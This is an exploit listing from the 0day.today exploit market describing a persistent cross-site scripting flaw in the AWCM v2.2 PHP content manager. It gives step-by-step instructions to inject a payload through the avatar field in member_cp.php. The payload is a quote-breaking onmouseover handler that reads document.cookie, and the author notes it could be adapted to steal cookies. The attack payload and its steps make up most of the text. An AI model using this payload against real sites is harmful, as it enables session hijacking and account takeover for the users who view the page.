[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AWCM v2.2 final Persistent Cross Site Script Vulnerability

Author
_84kur10_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15378
Category
web applications
Date add
15-02-2011
Platform
php
# Exploit Title: AWCM v2.2 final Persistent Cross Site Script
# Date: 13-02-2011
# Author:_84kur10_
# Software Link: www.awcm-cms.com
# Version: v2.2
# CVE :
# Contact: 84kur10[at]gmail.com
# Greetz to: SLG all Members, D4nb4r, Navi_terrible, J3h3s, C4br4
 
http://sourceforge.net/projects/awcm/files/
 
Register a new user, go to your main panel in
http://[url]/awcm/member_cp.php, edit your avatar and put:
 
" onmouseover="alert(document.cookie)"><!--
 
Each that hovered over the area of avatar, jump our alert. we could
make some adjustments to make stealing a cookies.



#  0day.today [2024-12-25]  #